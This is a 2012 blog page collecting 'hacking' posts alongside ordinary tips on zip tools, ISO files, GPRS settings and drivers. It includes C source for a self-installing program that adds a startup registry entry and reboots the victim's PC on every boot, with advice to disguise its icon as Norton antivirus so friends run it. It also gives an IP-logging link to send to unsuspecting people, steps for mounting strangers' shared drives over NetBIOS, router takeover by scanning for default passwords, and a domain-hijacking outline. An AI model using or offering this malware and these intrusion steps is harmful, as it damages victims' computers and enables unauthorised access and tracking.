Tuesday 7 February 2012

How to Test the Working of your Antivirus – EICAR Test

Have you ever wondered how to test your Antivirus software to ensure it’s proper working? Well here is a quick and easy way to test your antivirus. The process is called EICAR test which will work on any antivirus and was developed by European Institute of Computer Antivirus Research. This process can be used by people, companies and antivirus programmers to test the proper functioning of the antivirus/antimalware software without having to deal with the real computer virus which can cause damage to the computer. Here is a step-by-step procedure to test your antivirus.

1. Open a notepad (New Text Document.TXT) and copy the following code exactly onto it, and save the notepad.

EICAR Test code

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

2. Rename the file from New Text Document.TXT to myfile.com

3. Now run the antivirus scan on this myfile.com file.

If the antivirus is functioning properly on your computer, then it should generate a warning and immediately delete the file upon scanning. Otherwise you may have to re-install your antivirus.

A Virus Program to Restart the Computer at Every Startup

Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.

For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C. So if you are familiar with C language then it’s too easy to understand the logic behind the coding.

Here is the source code.

#include
#include
#include

int found,drive_no;char buff[128];

void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}

void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;

case 2:
target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;

case 3:
target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;

case 4:
target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;

default:
exit(0);
}

while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}

else
system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart
}


OR download from following link

Download


Testing And Removing The Virus From Your PC


You can compile and test this virus on your own PC without any fear. To test, just doubleclick the sysres.exe file and restart the system manually. Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.


1. Reboot your computer in the SAFE MODE

2. Goto

X:\Windows\System(X can be C,D,E or F)

3.You will find a file by name sysres.exe, delete it.

4.Type regedit in run.You will goto registry editor.Here navigate to


HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run
There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.


Logic Behind The Working Of The Virus


If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete. So I’ll explain the logic in a simplified manner. Here I’ll not explain the technical details of the program. If you have further doubts please pass comments.


LOGIC:


1. First the virus will find the Root partition (Partition on which Windows is installed).

2. Next it will determine whether the Virus file is already copied(Already infected) into X:\Windows\System

3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.

4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.

This process is repeated every time the PC is restarted.


NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.

AND ONE MORE THING BEFORE YOU LEAVE (This Step is optional)


After you compile, the Sysres.exe file that you get will have a default icon. So if you send this file to your friends they may not click on it since it has a default ICON. So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.

For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.

How to Find the IP Address of a Remote Computer

Most of you may be curious to know how to find the IP address of your friend’s computer or to find the IP address of the person with whom you are chatting in Yahoo messenger or Gtalk. In this post I’ll show you how to find the IP address of a remote computer in simple steps.



I have created a PHP script to make it easier for you to find the IP address of the remote computer of your choice. Here is a step-by-step process to find out the IP address.

1. Download the IP Finder script (IP_Finder.ZIP) that I have created.

2. Open a new account in X10Hosting (or any free host that supports PHP).

3. Extract the IP_Finder.ZIP file and upload the two files ip.php and ip_log.txt into the root folder of your hosting account using the File Manager.

4. You can rename the ip.php to any name of your choice.

5. Set the permission to 777 on ip_log.txt.

Now you are all set to find the IP address of your friend or any remote computer of your choice. All you have to do is send the link of ip.php to your friend or the person with whom you’re chatting. Once the person click’s on the link, his/her IP address is recorded in the file ip_log.txt.

For your better understanding let’s take up the following example.

Suppose you open a new account in X10hosting.com with the subdomain as abc, then your IP Finder link would be

http://abc.x10hosting.com/ip.phpYou have to send the above link to you friend via email or while chatting and ask him to visit that link. Once your friend clicks on the link, his IP address will be recorded along with the Date and Time in the ip_log.txt file. After recording the IP address, the script will redirect the person to google.com so as to avoid any suspicion.

To find the recorded IP address check the logs using the following link.

http://abc.x10hosting.com/ip_log.phpThe sample log will be in the following format

79.92.144.237 Thursday 07th of May 2009 05:31:27 PM
59.45.144.237 Thursday 07th of May 2009 05:31:28 PM
123.92.144.237 Thursday 07th of May 2009 05:31:31 PM

NOTE: You have to replace abc with your subdomain name.

I hope this helps. Express your opinion and suggestions through comments.


ip finder script is as follows



save it as ip.php in ipfinder folder

create a new text file with the name ip_log.txt

enjoy

Netbios Hacking

THIS NETBIOS HACKING GUIDE WILL TELL YOU ABOUT HACKING REMOTE COMPUTER AND GAINING ACCESS TO IT’S HARD-DISK OR PRINTER. NETBIOS HACK IS THE EASIEST WAY TO BREAK INTO A REMOTE COMPUTER.

STEP-BY-STEP NETBIOS HACKING PROCEDURE

1.Open command prompt

2. In the command prompt use the “net view” command
( OR YOU CAN ALSO USE “NB Scanner” OPTION IN “IP TOOLS” SOFTWARE BY ENTERING RANGE OF IP ADDRESSS. BY THIS METHOD YOU CAN SCAN NUMBER OF COMPUTERS AT A TIME).


Example: C:\>net view \\219.64.55.112
The above is an example for operation using command prompt. “net view” is one of the netbios command to view the shared resources of the remote computer. Here “219.64.55.112″ is an IP address of remote computer that is to be hacked through Netbios. You have to substitute a vlaid IP address in it’s place. If succeeded a list of HARD-DISK DRIVES & PRINTERS are shown. If not an error message is displayed. So repeat the procedure 2 with a different IP address.

3. After succeeding, use the “net use” command in the command prompt. The “net use” is another netbios command which makes it possible to hack remote drives or printers.

Example-1:
C:\>net use D: \\219.64.55.112\F
Example-2:
C:\>net use G: \\219.64.55.112\SharedDocs
Example-3:
C:\>net use I: \\219.64.55.112\Myprint

NOTE: In Examples 1,2 & 3, D:,G: & I: are the Network Drive Names that are to be created on your computer to access remote computer’s hard-disk.

NOTE: GIVE DRIVE NAMES THAT ARE NOT USED BY ANY OTHER DRIVES INCLUDING HARD-DISK DRIVES, FLOPPY DRIVES AND ROM-DRIVES ON YOUR COMPUTER. THAT IS, IF YOU HAVE C: & D: AS HARD DIRVES, A: AS FLOPPY DIVE AND E: AS CD-DRIVE, GIVE F: AS YOUR SHARED DRIVE IN THE COMMAND PROMPT
F:,”SharedDocs” are the names of remote computer’s hard-disk’s drives that you want to hack. “Myprint” is the name of remote computer’s printer. These are displayed after giving “net use” command. “219.64.55.112″ is the IP address of remote computer that you want to hack.

4. After succeeding your computer will give a message that “The command completed successfully“. Once you get the above message you are only one step away from hacking the computer.

Now open “My Computer” you will see a new “Hard-Disk drive”(Shared) with the specified name. You can open it and access remote computer’s Hard-Drive. You can copy files, music, folders etc. from victim’s hard-drive. You can delete/modify data on victim’s hard-drive only if WRITE-ACCESS is enabled on victim’s system. You can access files/folders quickly through “Command Prompt”.


NOTE: If Remote Computer’s Firewall Is Enabled Your Computer Will Not Succeed In Gaining Access To Remote Computer Through Netbios. That is Netbios Hacking Is Not Possible In This Situation.(An Error Message Is Displayed). So Repeat The Procedure 2,3 With Different IP Address.

How to Trace Any IP Address

Once you obtain this IP address it is necessary to trace it back to it’s source. So in this post I will show you how to trace any IP address back to it’s source. In fact tracing an IP address is very simple and easy than we think. There exists many websites through which you can trace any IP address back to it’s source. One of my favorite site is ip2location.com.

Just go to http://www.ip2location.com/demo.aspx and enter the IP address that you want to trace in the dialog box and click on “Find Location”‘. With just a click of a button you can find the following information for any given IP address.

1. Country in which the IP is located

2. Region

3. City

4. Latitude/Longitude

5. Zip Code

6. Time Zone

7. Name of the ISP

8. Internet Speed

9. Weather Station

10. Area Code and

11. Domain name associated with the IP address.


You can also visually trace route any IP address back to it’s location. For this just visit http://www.yougetsignal.com/tools/visual-tracert/ and enter the IP you want to trace in the dialog box and hit the “Proxy Trace” button. Wait for few seconds and the visual trace route tool displays the path Internet packets traverse to reach a specified destination. Hope this helps. Please pass you comments.

Domain Hijacking – How to Hijack a Domain

In this post I will tell you about how the domain names are hacked and how they can be protected. The act of hacking domain names is commonly known as Domain Hijacking. For most of you, the term “domain hijacking” may seem to be like an alien. So let me first tell you what domain hijacking is all about.

Domain hijacking is a process by which Internet Domain Names are stolen from it’s legitimate owners. Domain hijacking is also known as domain theft. Before we can proceed to know how to hijack domain names, it is necessary to understand how the domain names operate and how they get associated with a particular web server (website).


The operation of domain name is as follows

Any website say for example gohacking.com consists of two parts. The domain name (gohacking.com) and the web hosting server where the files of the website are actually hosted. In reality, the domain name and the web hosting server (web server) are two different parts and hence they must be integrated before a website can operate successfully. The integration of domain name with the web hosting server is done as follows.

1. After registering a new domain name, we get a control panel where in we can have a full control of the domain.

2. From this domain control panel, we point our domain name to the web server where the website’s files are actually hosted.

For a clear understanding let me take up a small example.

John registers a new domain “abc.com” from an X domain registration company. He also purchases a hosting plan from Y hosting company. He uploads all of his files (.html, .php, javascripts etc.) to his web server (at Y). From the domain control panel (of X) he configures his domain name “abc.com” to point to his web server (of Y). Now whenever an Internet user types “abc.com”, the domain name “abc.com” is resolved to the target web server and the web page is displayed. This is how a website actually works.


What happens when a domain is hijacked

Now let’s see what happens when a domain name is hijacked. To hijack a domain name you just need to get access to the domain control panel and point the domain name to some other web server other than the original one. So to hijack a domain you need not gain access to the target web server.

For example, a hacker gets access to the domain control panel of “abc.com”. From here the hacker re-configures the domain name to point it to some other web server (Z). Now whenever an Internet user tries to access “abc.com” he is taken to the hacker’s website (Z) and not to John’s original site (Y).

In this case the John’s domain name (abc.com) is said to be hijacked.


How the domain names are hijacked

To hijack a domain name, it’s necessary to gain access to the domain control panel of the target domain. For this you need the following ingredients

1. The domain registrar name for the target domain.

2. The administrative email address associated with the target domain.

These information can be obtained by accessing the WHOIS data of the target domain. To get access the WHOIS data, goto whois.domaintools.com, enter the target domain name and click on Lookup. Once the whois data is loaded, scroll down and you’ll see Whois Record. Under this you’ll get the “Administrative contact email address”.

To get the domain registrar name, look for something like this under the Whois Record. “Registration Service Provided By: XYZ Company”. Here XYZ Company is the domain registrar. In case if you don’t find this, then scroll up and you’ll see ICANN Registrar under the “Registry Data”. In this case, the ICANN registrar is the actual domain registrar.

The administrative email address associated with the domain is the backdoor to hijack the domain name. It is the key to unlock the domain control panel. So to take full control of the domain, the hacker will hack the administrative email associated with it.
Once the hacker take full control of this email account, he will visit the domain registrar’s website and click on forgot password in the login page. There he will be asked to enter either the domain name or the administrative email address to initiate the password reset process. Once this is done all the details to reset the password will be sent to the administrative email address. Since the hacker has the access to this email account he can easily reset the password of domain control panel. After resetting the password, he logs into the control panel with the new password and from there he can hijack the domain within minutes.




How to protect the domain name from being hijacked

The best way to protect the domain name is to protect the administrative email account associated with the domain. If you loose this email account, you loose your domain. So refer my previous post on how to protect your email account from being hacked. Another best way to protect your domain is to go for private domain registration. When you register a domain name using the private registration option, all your personal details such as your name, address, phone and administrative email address are hidden from the public. So when a hacker performs a WHOIS lookup for you domain name, he will not be able to find your name, phone and administrative email address. So the private registration provides an extra security and protects your privacy. Private domain registration costs a bit extra amount but is really worth for it’s advantages. Every domain registrar provides an option to go for private registration, so when you purchase a new domain make sure that you select the private registration option.

Hack BSNL Broadband for Speed

If you are a BSNL broadband user, chances are that you are facing frequent DNS issues. Their DNS servers are just unresponsive. The look up takes a long duration and many times just time out. The solution? There is small hack on BSNL for this. Use third party DNS servers instead of BSNL DNS servers or run your own one like djbdns. The easiest options is to use OpenDNS. Just reconfigure your network to use the following DNS servers:


208.67.222.222
208.67.220.220

Detailed instructions specific to operating system or your BSNL modem are available in the OpenDNS website itself. After I reconfigured my BSNL modem to use the above 2 IP addresses, my DNS problems just vanished! Other ‘freebies’ that come with OpenDNS are phishing filters and automatic URL correction. Even if your service provider’s DNS servers are working fine, you can still use OpenDNS just for these two special features. After you hack BSNL DNS servers, you will see a noticeable improvement in your broadband speed

Router Hacking

Almost half of the Internet users across the globe use ADSL routers/modems to connect to the Internet however, most of them are unaware of the fact that it has a serious vulnerability which can easily be exploited even by a noob hacker just like you. In this post I will show you how to exploit a common vulnerability that lies in most ADSL routers so as to gain complete access to the router settings and ISP login details.

Every router comes with a username and password using which it is possible to gain access to the router settings and configure the device. The vulnerability actually lies in the Default username and password that comes with the factory settings. Usually the routers come preconfigured from the Internet Service provider and hence the users do not bother to change the password later. This makes it possible for the attackers to gain unauthorized access and modify the router settings using a common set of default usernames and passwords. Here is how you can do it.

Before you proceed, you need the following tool in the process

Angry IP Scanner

Here is a detailed information on how to exploit the vulnerability of an ADSL router.

Step-1: Go to http://www.whatismyipaddress.com/. Once the page is loaded you will find your IP address. Note it down.

Step-2: Open Angry IP Scanner, here you will see an option called IP Range: where you need to enter the range of IP address to scan for.

Suppose your IP is 117.192.195.101, you can set the range something as 117.192.194.0 to 117.192.200.255 so that there exists atleast 200-300 IP addresses in the range.
Step-3: Go to Tools->Preferences and select the Ports tab. Under Port selection enter 80 (we need to scan for port 80). Now switch to the Display tab, select the option “Hosts with open ports only” and click on ok



I have used Angry IP Scanner v3.0 beta-4. If you are using a different version, you need to Go to Options instead of Tools
Step-4: Now click on Start. After a few minutes, the IP scanner will show a list of IPs with Port 80 open as shown in the below image


Step-5: Now copy any of the IP from the list, paste it in your browser’s address bar and hit enter. A window will popup asking for username and password. Since most users do not change the passwords, it should most likely work with the default username and password. For most routers the default username-password pair will be admin-admin or admin-password.

Just enter the username-password as specified above and hit enter. If you are lucky you should gain access to the router settings page where you can modify any of the router settings. The settings page can vary from router to router. A sample router settings page is shown below.



If you do not succeed to gain access, select another IP from the list and repeat the step-5. Atleast 1 out of 5 IPs will have a default password and hence you will surely be able to gain access.


What can an Attacker do by Gaining Access to the Router Settings?
By gaining access to the router settings, it is possible for an attacker to modify any of the router settings which results in the malfunction of the router. As a result the target user’s computer will be disconnected from the Internet. In the worst case the attacker can copy the ISP login details from the router to steal the Internet connection or play any kind of prank with the router settings. So the victim has to reconfigure the router in order to bring it back to action.


The Verdict:
If you are using an ADSL router to connect to the Internet, it is highly recommended that you immediately change your password to prevent any such attacks in the future. Who knows, you may be the next victim of such an attack.

Since the configuration varies from router to router, you need to contact your ISP for details on how to change the password for your model.

Warning!
All the information provided in this post are for educational purposes only. Please do not use this information for illegal purposes.

Sunday 5 February 2012

Top 5 Free Winzip Alternatives

handles compressed files like zip and rar is an essential requirement for every Windows PC. WinZip is the most popular utility for handling archive formats like zip,tar, iso etc. But the WinZip is not free and you have to pay for it for using it in your PC. Do you know that there are some good alternatives for WinZip which performs the same functions and sometimes even more? This articles list the top 5 free zipping application that can replace WinZip.

1. 7zip

7 zip is the most popular open source zipping application. 7zip may not have a very attractive GUI but it can do almost all functions of WinZip. It can open ZIP, RAR and all other popular formats, and it sports it own 7Z format that is quite good. For ZIP and GZIP formats, 7-Zip provides a compression ratio that is 2-10 % better than the ratio provided by WinZip. 7zip have a powerful command line version and runs on Winows, Linux, OS X platforms. 7 zip also also in a portable version from Portableapps.com. Overall this is the best free zipping utility that can replace WinZip.

2. IZArc

IZArc is another freeware archive utility supporting many archive formats like: 7-ZIP, A, ACE, ARC, ARJ, B64, BH, BIN, BZ2, BZA, C2D, CAB, CDI, CPIO, DEB, ENC, GCA, GZ, GZA, HA, IMG, ISO, JAR, LHA, LIB, LZH, MDF, MBF, MIM, NRG, PAK, PDI, PK3, RAR, RPM, TAR, TAZ, TBZ, TGZ, TZ, UUE, WAR, XXE, YZ1, Z, ZIP, ZOO. With a more attractive user interface than 7zip, IZArc provides support for all most all compressed and encoded files, as well as access to many powerful features and tools. It supports easy drag and drop files from and to Windows Explorer, create and extract archives directly in Windows Explorer, create multiple archives spanning disks, creating self-extracting archives, repair damaged zip archives, converting from one archive type to another, view and write comments and many more. IZArc comes with a build-in multi language support.

3. Peazip

PeaZip is a file manager and file archiver for Microsoft Windows and GNU/Linux.[6] It supports its native PEA archive format (featuring compression, multi volume split and flexible authenticated encryption and integrity check schemes) and other mainstream formats, with special focus on handling open formats. Other notable features of the program includes archive conversion, file splitting and joining, secure file deletion, byte-to-byte file comparison, archive encryption, checksum/hash files, system benchmarking, random passwords/keyfiles generation, and integration in the Windows Explorer context menu. In addition, the program’s user interface (including icons and color scheme) can be customized. Along with more popular and general-purpose archive formats like 7z, Tar, ZIP etc., PeaZip
supports the PAQ and LPAQ formats.

4. TUGZip

TUGZip is a powerful award-winning freeware archiving utility for Windows that provides support for a wide range of compressed, encoded and disc-image files, as well as very powerful features; all through an easy to use application interface and Windows Explorer integration. It supports ZIP, 7-ZIP, A, ACE, ARC, ARJ, BH, BZ2, CAB, CPIO, DEB, GCA, GZ, IMP, JAR, LHA (LZH), LIB, RAR, RPM, SQX, TAR, TGZ, TBZ, TAZ, YZ1, and ZOO archives. included comes an SFX-tool to create self-extracting archives and an additional scripting tool to simplify automated backups. Additional features include support for Zip64 algorithm, built-in encryption using multiple algorithms (Blowfish, DES, Triple DES and Rijndael). It supports multi-volume archives, creation of self-extracting archives and password protection. With six different algorithms, TUGZip has very powerful password protection. TUGZip will also easily integrate with your Outlook
client and virus scanner.

5. DropZip

When you install DropZip, it automatically adds an icon to the Quick Launch toolbar. Drag ZIP or RAR files onto the programs icon, and DropZip quickly decompresses them. The program can zip folders too, although it only handles one at a time. This is not designed to be a replacement for your normal ZIP or RAR programs; instead, it is designed for convenience when you need to quickly unzip or unrar something.

convert any Folder to ISO Image File

An ISO image is uncompressed archive which contains all the files of the DVD or CD from which it is copied.These ISO images can be easily burned to DVD or CD’s.They can also be mounted so that computer will treat them as a actual optical disk.If you want to create a bootable DVD/CD for your windows operating system then you have to create an ISO image of the windows Setup before burning it to DVD/CD.There are large number of softwares available to create ISO images like Power ISO but most of them are paid and large in size.By using this trick you can create an ISO image from a freeware utility (only 800 kb in size)

Trick to convert any Folder to ISO Image File:-

•First of all download ISO Recorder (800 KB) and install it.
•Now go to your Folder for which you want to create an ISO file.•Right click on that Folder and choose Create ISO Image File option.
•In pop pop up window browse the location where you want to save this .iso (image) file and click on the next button.
• After this you will see a message saying like this Operation has been completed and click on the finish button.
•Now go to the location where you had save the .iso file and you will see a image file like this.

To open these ISO files you need software like WinRAR, Demons Tools, Power ISO etc.

get iso recorder from following link

http://isorecorder.alexfeinman.com/isorecorder.htm

TRANSFER SPECIAL BALANCE TO MAIN BALANCE DOCOMO

work with docomo


first recharge with any special recharge for full talk time starting form Rs. 9, if you dont have any special balance.



Then dial *595#. An USSD alert will display like Service not active.

Then check your balance. Rs. 1 will be moved from your
special balance to main balance. Do the same step for
transferring the remaining special balance into the main
account(For me -1 is possible in my special balance, so
that i will get special balance + 1 rs to my main balance.


If you got message that, Rs.1 has been deducted, dont be panic. No amount will get deducted.

Free gprs settings For Any Operator Network

Free manual GPRS settings:
Most of people have face problems regarding gprs settings on their mobile phones. I have been getting lots of public reviews about how to configure and where to get gprs setting, So I publish here most of gprs settings for most of mobile service operator (India) to enter in your phone mannulay. Here you have manual gprs settings for vodafone, hutch, idea, airtel, bsnl, airtel live, airtel mobile you can enter in your phone and configure manually.



Manual Videocon GPRS Settings:
Profile Neme: Videocon
Homepage: http://www.google.co.in,
Username: blank,Get free GPRS settings for any operator/mobile in world on Your Mobile Phone. If you feeling problem to setup gprs settings manually (given below or any other), or after calling many times to customer care they unable to solve your problem, then I have another solution for you. I'll send free gprs setting right on your mobile phones.

Read More: http://www.mannuforall.in/2008/04/free-gprs-settings-for-any-operator.html#ixzz1VYjzQJwS

Password: blank,
APN: vinternet.com,
Proxy: blank,
Port: 0 or blank,
Authentication: normal
Data bearer - GPRS or Packet


Manual Uninor GPRS Settings:
Profile name: uninor
Homepage: www.google.com
Enable Proxy
Ip address: 10.58.10.58
Port: 8080
APN: uninor
Bearer: GPRS(if required)


Manual Virgin Mobile GPRS Settings:
Virgin Internet:
Profile name- vinternet
Homepage- http://www.google.co.in
APN- vinternet.in
IP- 000.000.000.000 (or keep blank)
Port- 0 (or keep blank)
Authentication type:Normal
Bearer: GPRS (if required)


Manual TATA DOCOMO GPRS Settings:

Under the 'TATA DOCOMO INTERNET' WAP profile in Settings:
Connection Name TATA DOCOMO INTERNET
Data Bearer GPRS
Access Point Name TATA.DOCOMO.INTERNET
Username Blank
Password Blank
Homepage any
Connection Security Off
Session Mode Permanent

If you do not have a Nokia and Sony Ericsson phone, you'll need to set your phone manually with these details.Setting Name TATA DOCOMO Internet
Home page any
Session mode Permanent
Connection Security Off
Data Bearer GPRS
GPRS Access point TATA.DOCOMO.INTERNET
IP address
Authentication type Normal
Login type
User name Blank
Password Blank


Manual Reliance Smart GPRS Settings:
Settings for SMARTWAP:
* Account name : SMARTWAP
* Access point name: SMARTWAP
* Home page: http://wap.rworld.co.in/gsm/index.wml
* Wapgateway proxy IP address: 97.253.29.199
* Port: 8080

Settings for SMATRNET:
* Account name: SMARTNET
* Access point name: SMARTNET
* Home page: http://www.google.co.in
* Wapgateway proxy IP address: 97.253.29.199
* Port: 8080

Manual Idea gprs Settings:

Account Name - idea_GPRS
Username - leave Blank
Password - leave Blank
Homepage - http://wap.ideafresh.com
Proxy and Server Port - 8080
Proxy and Server adress - 010.004.042.045
Databearer - GPRS / Packetdata
Acces Point Name - imis
Proxy - Enabled/yes
Authentication Type - Normal
Manual Hutch or Vodafone Essar gprs Setting:


Account Name - Vodafone Live
User Name - leave Blank
Password - leave Blank
Proxy - Enabled/yes
Access Point Name - portalnmms
Proxy - Enabled/yes.
Proxy and Server address - 010.010.001.100
Proxy and Server Port - 9401 or 8080
Homepage - http://live.vodafone.in
Authentication Type - Normal
Manual Airtel gprs Settings:

Account Name - Airtel_gprs
User Name - leave Blank
Password - leave Blank
Homepage - http://live.airtelworld.com
Proxy - Enabled/yes.
Proxy and Server Adress - 202.56.231.117
Proxy and Server Port - 8080
Data bearer - GPRS or Packet Data.
Access Point Name - airtelgprs.com
Authentication Type - Normal
Use preferred access point - No
Manual Airtel live settings:
Account Name - Airtel_live
Homepage - http://live.airtelworld.com
Username - leave Blank
Password - leave Blank
Proxy - Enabled/yes
Proxy and Server Adress - 100.001.200.099
Accespoint Name - airtelfun.com
Proxy and Server Port - 8080
Data bearer - GPRS/ Packet Data
Authentication Type - Normal
Manual BPL gprs Settings:

Account Name - BPL WAP
Username - leave blank
Password - leave blank
Proxy - Enabled/yes
Homepage - http://wap.mizone.bplmobile.com
Proxy and Server address - 10.0.0.10
Proxy and Server Port - 8080
Acces Point Name - mizone
Data bearer - GPRS/ Packetdata
Authentication Type - Normal
Manual BSNL gprs Settings:

Account Name - bsnllive
Username - leave blank
Password - leave blank
Proxy - Enabled/yes
Homepage - http://wap1.cellone.in
Proxy and Server address - 010.220.067.131 (000.000.000.000 or disable for pc browsing)
Proxy and Server Port - 8080 (0 or disable for pc browsing)
Acces Point Name - bsnllive (bsnlnet for pc browsing)
Data bearer - GPRS/ Packetdata
Authentication Type - Normal

5 Websites to Download Your Laptop Drivers

> www.laptopdrivers.net


> www.driverzone.com Another website to get your notebook driver. Also it has more than 100,000 files and you can get the drivers for even 10 year old laptop. Overall nice website.


> www.opendrivers.com Download the drivers directly from this website.


> www.notebook-driver.com A website for downloading laptop drivers


> www.notebookera.com

This website offers you almost every drivers.
Anyway I will recommend to use first two websites to download your laptop (notebook) drivers This is the best one to get your all drivers. My experience with them was really awesome.

Disable the writing option to USB drives

If you have windows XP with SP2, then you can disable the writing option to USB drives. This trick is very useful if you have virus in your computer and want to copy files from a USB Drive but don’t want to transfer virus to the USB. Follow the given steps to disable the USB writing option:


To edit the computer registry, first you should log onto your computer with administrative rights.

First click on Start button and type “Regedit” in Run option.

Here locate the location to:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control

Here in right side panel, click right to create a key with the name “StorageDevicePolicies”.

Now in left side panel, select “StorageDevicePolicies” key, again right click to create new DWORD value then label it “WriteProtect”. Set its value to “1?. But again to enable writing, set its values to “0?.

Now close the registry editor and restart your computer after any changes to go into effect

Wednesday 1 February 2012

Lock Your PC Using Flash Drive


Turn any USB flash drive into a key to your computer. If you want to secure your computer so no one can access it when you’re not around (this comes in really handy for laptops. There’s a small program called Predator that you can install on a USB drive that allows you to use that USB drive to lock your computer. It does this by disabling your keyboard, monitor and mouse whenever you remove the special USB drive from your computer. Simply remove the flash drive and your computer is locked, until you return and insert the flash drive back into a USB port on your computer. So what Predator does is turn a USB flash drive into a key that locks and unlocks your computer. It’s really great if you travel and take a notebook with you or if you don’t want people snooping around your PC when you’re not home.

Here’s some details on Predator from the program’s developer:

“PREDATOR locks your PC when you are away, even if your Windows session is still opened. It uses a regular USB flash drive as an access control device, and works as follows:

you insert the USB drive * you run PREDATOR (autostart with Windows is possible)

you do your work…

when you’re away from your PC, you simply remove the USB drive: once it is removed, the keyboard and mouse are disabled and the screen darkens

when you return back to your PC, you put the USB flash drive in place: keyboard and mouse are immediately released, and the display is restored. It’s easier and faster than closing your Windows session, since you do not have to retype your password when you return. Advanced Security Features:

PREDATOR records all security-related events in a log file: start, alarms, stop. By reading this log, you will know if intruders have tried to use your computer while you have been away. * PREDATOR can replicate this log on your Twitter account, allowing you to remotely monitor all access-control activity on your PC.

PREDATOR frequently changes the security codes recorded on your USB drive. If an intruder manages to copy your stick, this copy will not work because the codes on your own stick will have changed in the meantime.

PREDATOR disables the Windows task manager when you unplug the USB drive. Nobody can stop it with Ctrl-Alt-Del.

PREDATOR lets you regain control of your computer if you lose your stick: when you start the software for the first time, you set a password that will unlock your session if your USB drive is not available.

PREDATOR can sound an audible alarm if somebody enters an invalid password.

And finally, PREDATOR can protect several PCs with the same USB flash drive, e.g. your home and office computers. With PREDATOR, security is as simple as inserting or removing a USB stick

for downloading software go to

http://www.montpellierinformatique.com/predator/en/dl/free/InstallPredator.zip

How to Crack BIOS Passwords

BIOS passwords can add an extra layer of security for desktop and laptop computers. They are used to either prevent a user from changing the BIOS settings or to prevent the PC from booting without a password. Unfortunately, BIOS passwords can also be a liability if a user forgets their password, or changes the password to intentionally lock out the corporate IT department. Sending the unit back to the manufacturer to have the BIOS reset can be expensive and is usually not covered in the warranty. Never fear, all is not lost. There are a few known backdoors and other tricks of the trade that can be used to bypass or reset the BIOS

DISCLAIMER
This article is intended for IT Professionals and systems administrators with experience servicing computer hardware. It is not intended for home users, h@ckers, or computer thieves attempting to cr@ck the password on a stolen PC. Please do not attempt any of these procedures if you are unfamiliar with computer hardware, and please use this information responsibly. LabMice.net is not responsible for the use or misuse of this material, including loss of data, damage to hardware, or personal injury.


Before attempting to bypass the BIOS password on a computer, please take a minute to contact the hardware manufacturer support staff directly and ask for their recommended methods of bypassing the BIOS security. In the event the manufacturer cannot (or will not) help you, there are a number of methods that can be used to bypass or reset the BIOS password yourself. They include:

Using a manufacturers backdoor password to access the BIOS

Use password cr@cking software

Reset the CMOS using the jumpers or solder beads.

Removing the CMOS battery for at least 10 minutes

Overloading the keyboard buffer

Using a professional service

Please remember that most BIOS passwords do not protect the hard drive, so if you need to recover the data, simply remove the hard drive and install it in an identical system, or configure it as a slave drive in an existing system. The exception to this are laptops, especially IBM Thinkpads, which silently lock the hard drive if the supervisor password is enabled. If the supervisor password is reset without resetting the and hard drive as well, you will be unable to access the data on the drive.


--------------------------------------------------------------------------------

Backdoor passwords

